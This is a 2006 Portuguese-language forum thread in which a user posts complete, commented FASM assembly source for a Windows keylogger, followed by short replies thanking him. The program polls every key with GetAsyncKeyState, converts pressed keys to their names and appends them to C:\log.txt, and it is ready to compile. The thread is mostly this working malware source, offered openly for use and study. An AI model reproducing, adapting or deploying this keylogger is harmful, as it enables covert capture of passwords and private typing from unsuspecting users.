Title: [Source] Simples KeyLogger em ASM
Post by: Dark_Side on 06 de October , 2006, 03:09:25 AM
Post by: Dark_Side on 06 de October , 2006, 03:09:25 AM
Hi,
Segue um simples programa que demonstra uma maneira básica de ser criar um keylogger em Assembly.
O código foi compilado no Fasm.
Segue um simples programa que demonstra uma maneira básica de ser criar um keylogger em Assembly.
O código foi compilado no Fasm.
Code Select
format PE GUI 5.0
entry start ; Ponto de partida
include 'win32a.inc' ; funções e constantes -> API do Windows
log db "C:\log.txt",0 ; Arquivo de log
buffer db 0x100 dup (?) ; Buffer -> nome da tecla
bytes_escritos dd 0 ; variável -> armazena número de bytes escritos no arquivo
start:
mov esi,7 ; esi = 7; Ignorar caracteres especiais -> logar de BackSpace em diante
invoke Sleep,1; Pausa -> evitar 100% de uso
jmp gogo ; Lolz, começa logar...
gogo:
cmp esi,255 ; Verifica se ESI = 255 -> última tecla
je start ; Se for, pula para o início onde o registrador receberá o valor inicial 7
inc esi ; Caso ainda não seja 255, incrementa o valor
invoke GetAsyncKeyState,esi ; Verifica se a tecla correspondente ao valor de ESI foi pressionada
cmp eax,0 ; Compara o valor de retorno (eax) com 0
jnz logar ; Se não for 0 = tecla pressionada -> logar tecla
jmp gogo ; Retorna ao loop caso a tecla não seja pressionada
logar:
invoke MapVirtualKey,esi,0 ; Obtém parâmetros da tecla
shl eax,16 ; Desloca 16 bits para a esquerda (shift left) -> parâmetro nome da tecla
invoke GetKeyNameText,eax,buffer,0x100 ; Obtém o nome da tecla e armazena em "buffer"
; Tenta criar o arquivo ou abri-lo
invoke CreateFile, log, GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_ARCHIVE, NULL
cmp eax,0 ; Verifica erro
je exit ; Encerra em caso de erro
; Como utilizaremos outras funções que alteram o valor do registrador EAX
; que atualmente possui o ponteiro para o arquivo criado acima, utilizamos o registrador EBX como backup
mov ebx,eax ; ebx = eax -> ponteiro para o arquivo
invoke SetFilePointer,ebx,0,0,FILE_END ; Move posição de leitura/escrita para o final do arquivo
invoke lstrlen,buffer ; Obtém tamanho em bytes do buffer ocupado -> retornado em EAX
invoke WriteFile,ebx,buffer,eax,bytes_escritos,NULL ; Escreve no arquivo o nome da tecla
invoke Sleep,100 ; Pausa entre a escrita no arquivo e o retorno à captura de teclas
invoke CloseHandle,ebx ; Fecha ponteiro para o arquivo
jmp gogo ; Gogo de novo :)
exit:
invoke ExitProcess,0 ; Encerra
; Funções lolz
data import
library kernel,'KERNEL32.DLL',\
user,'USER32.DLL'
import kernel,\
Sleep,'Sleep',\
CreateFile,'CreateFileA',\
WriteFile,'WriteFile',\
SetFilePointer,'SetFilePointer',\
CloseHandle,'CloseHandle',\
lstrlen,'lstrlenA',\
ExitProcess,'ExitProcess'
import user,\
GetAsyncKeyState, 'GetAsyncKeyState',\
MapVirtualKey,'MapVirtualKeyA',\
GetKeyNameText,'GetKeyNameTextA'
end data
Bye
Title: Re: [Source] Simples KeyLogger em ASM
Post by: rog on 06 de October , 2006, 03:39:14 AM
Post by: rog on 06 de October , 2006, 03:39:14 AM
esse e bem curtinho
vlw
rog
vlw
rog
Title: Re: [Source] Simples KeyLogger em ASM
Post by: Anonymous on 06 de October , 2006, 02:15:19 PM
Post by: Anonymous on 06 de October , 2006, 02:15:19 PM
Muito bom Dark, servirá como ótima fonte de estudo (pelo menos para mim).
Parabéns!
Parabéns!
Title: Re: [Source] Simples KeyLogger em ASM
Post by: insanity on 06 de October , 2006, 02:34:38 PM
Post by: insanity on 06 de October , 2006, 02:34:38 PM
ah, minha cabeça ate doeu agora he he he
Parabens aí dark_site...
ate mais
Parabens aí dark_site...
ate mais
Title: Re: [Source] Simples KeyLogger em ASM
Post by: Anonymous on 10 de December , 2006, 08:47:08 PM
Post by: Anonymous on 10 de December , 2006, 08:47:08 PM
Putz tiveram a mesma ideia q eu! 
Eu to fazendo um em asm, porem é pra linux, mas vlw por compartilhar Dark_Side
Eu to fazendo um em asm, porem é pra linux, mas vlw por compartilhar Dark_Side